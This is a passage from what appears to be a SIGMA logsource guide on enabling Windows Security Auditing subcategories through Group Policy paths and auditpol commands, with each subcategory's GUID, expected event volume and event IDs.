EventID: 5447](#provider-microsoft-windows-security-auditing--eventid-5447)\n\n</details>\n\n## Description\n\nThis logsource guide describes how to enable the necessary logging to make use of SIGMA rules that leverage the `security` service.\n\n## Event Source(s)\n\n```yml\nProvider: Microsoft Windows Security Auditing\nGUID: {54849625-5478-4994-a5ba-3e3b0328c30d}\nChannel: Security\n```\n\n## Logging Setup\n\n### Account Logon\n\n#### Credential Validation\n\n- Subcategory GUID: `{0CCE923F-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4774`\n  - `4775`\n  - `4776`\n  - `4777`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Logon\n                        - Audit Credential Validation\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE923F-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE923F-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-credential-validation)\n\n#### Kerberos Authentication Service\n\n- Subcategory GUID: `{0CCE9242-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High on Kerberos Key Distribution Center servers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4768`\n  - `4771`\n  - `4772`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Logon\n                        - Audit Kerberos Authentication Service\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9242-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9242-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-kerberos-authentication-service)\n\n#### Kerberos Service Ticket Operations\n\n- Subcategory GUID: `{0CCE9240-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Very High on Kerberos Key Distribution Center servers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4769`\n  - `4770`\n  - `4773`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Logon\n                        - Audit Kerberos Service Ticket Operations\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9240-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9240-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-kerberos-service-ticket-operations)\n\n#### Other Account Logon Events\n\n- Subcategory GUID: `{0CCE9241-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - TBD\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Logon\n                        - Audit Other Account Logon Events\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9241-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9241-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-account-logon-events)\n\n### Account Management\n\n#### Application Group Management\n\n- Subcategory GUID: `{0CCE9239-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4783`\n  - `4784`\n  - `4785`\n  - `4786`\n  - `4787`\n  - `4788`\n  - `4789`\n  - `4790`\n  - `4791`\n  - `4792`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Management\n                        - Audit Application Group Management\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9239-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9239-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-application-group-management)\n\n#### Computer Account Management\n\n- Subcategory GUID: `{0CCE9236-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low on domain controllers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4741`\n  - `4742`\n  - `4743`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Management\n                        - Audit Computer Account Management\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9236-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9236-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-computer-account-management)\n\n#### Distribution Group Management\n\n- Subcategory GUID: `{0CCE9238-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low on Domain Controllers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4749`\n  - `4750`\n  - `4751`\n  - `4752`\n  - `4753`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Management\n                        - Audit Distribution Group Management\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9238-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9238-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-distribution-group-management)\n\n#### Other Account Management Events\n\n- Subcategory GUID: `{0CCE923A-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Typically Low on all types of computers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4782`\n  - `4793`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Management\n                        - Audit Other Account Management Events\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE923A-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE923A-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-account-management-events)\n\n#### Security Group Management\n\n- Subcategory GUID: `{0CCE9237-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4727`\n  - `4728`\n  - `4729`\n  - `4730`\n  - `4731`\n  - `4732`\n  - `4733`\n  - `4734`\n  - `4735`\n  - `4737`\n  - `4754`\n  - `4755`\n  - `4756`\n  - `4757`\n  - `4758`\n  - `4764`\n  - `4799`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Management\n                        - Audit Security Group Management\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9237-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9237-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-security-group-management)\n\n#### User Account Management\n\n- Subcategory GUID: `{0CCE9235-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4720`\n  - `4722`\n  - `4723`\n  - `4724`\n  - `4725`\n  - `4726`\n  - `4738`\n  - `4740`\n  - `4765`\n  - `4766`\n  - `4767`\n  - `4780`\n  - `4781`\n  - `4794`\n  - `4798`\n  - `5376`\n  - `5377`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Management\n                        - Audit User Account Management\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9235-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9235-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-user-account-management)\n\n### Detailed Tracking\n\n#### DPAPI Activity\n\n- Subcategory GUID: `{0CCE922D-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4692`\n  - `4693`\n  - `4694`\n  - `4695`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Detailed Tracking\n                        - Audit DPAPI Activity\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE922D-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE922D-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-dpapi-activity)\n\n#### PNP Activity\n\n- Subcategory GUID: `{0CCE9248-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Varies, depending on how the computer is used. 
Typically Low.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `6416`\n  - `6419`\n  - `6420`\n  - `6421`\n  - `6422`\n  - `6423`\n  - `6424`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Detailed Tracking\n                        - Audit PNP Activity\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9248-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9248-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-pnp-activity)\n\n#### Process Creation\n\n- Subcategory GUID: `{0CCE922B-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4688`\n  - `4696`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Detailed Tracking\n                        - Audit Process Creation\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE922B-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE922B-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-creation)\n\n#### Process Termination\n\n- Subcategory GUID: `{0CCE922C-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low to Medium, depending on system usage.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4689`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Detailed Tracking\n                        - Audit Process Termination\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE922C-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE922C-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-termination)\n\n#### RPC Events\n\n- Subcategory GUID: `{0CCE922E-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `5712`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Detailed Tracking\n                        - Audit RPC Events\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE922E-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE922E-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-rpc-events)\n\n#### Token Right Adjusted\n\n- Subcategory GUID: `{0CCE924A-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4703`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Detailed Tracking\n                        - Audit Token Right Adjusted\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE924A-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE924A-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-token-right-adjusted)\n\n### DS Access\n\n#### Detailed Directory Service Replication\n\n- Subcategory GUID: `{0CCE923E-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `These events can create a very high volume of event data on domain controllers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4928`\n  - `4929`\n  - `4930`\n  - `4931`\n  - `4934`\n  - `4935`\n  - `4936`\n  - `4937`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - DS Access\n                        - Audit Detailed Directory Service Replication\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE923E-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE923E-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-detailed-directory-service-replication)\n\n#### Directory Service Access\n\n- Subcategory GUID: `{0CCE923B-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High on servers running AD DS role services.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4661`\n  - `4662`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - DS Access\n                        - Audit Directory Service Access\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE923B-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE923B-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-directory-service-access)\n\n#### Directory Service Changes\n\n- Subcategory GUID: `{0CCE923C-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High on Domain Controllers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `5136`\n  - `5137`\n  - `5138`\n  - `5139`\n  - `5141`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - DS Access\n                        - Audit Directory Service Changes\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE923C-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE923C-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-directory-service-changes)\n\n#### Directory Service Replication\n\n- Subcategory GUID: `{0CCE923D-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Medium on Domain Controllers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4932`\n  - `4933`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - DS Access\n                        - Audit Directory Service Replication\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE923D-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE923D-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-directory-service-replication)\n\n### Logon/Logoff\n\n#### Account Lockout\n\n- Subcategory GUID: `{0CCE9217-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4625\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit Account Lockout\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9217-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9217-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-account-lockout)\n\n#### User/Device Claims\n\n- Subcategory GUID: `{0CCE9247-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume:\n  - `Low on a client computer.`\n  - `Medium on a domain controller or network servers.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4626\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit User/Device Claims\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9247-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9247-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-user-device-claims)\n\n#### Group Membership\n\n- Subcategory GUID: `{0CCE9249-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume:\n  - `Low on a client computer.`\n  - `Medium on a domain controller or network servers.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4627\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit Group Membership\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9249-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9249-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-group-membership)\n\n#### IPsec Extended Mode\n\n- Subcategory GUID: `{0CCE921A-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4978\n  - 4979\n  - 4980\n  - 4981\n  - 4982\n  - 4983\n  - 4984\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit IPsec Extended Mode\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE921A-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE921A-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
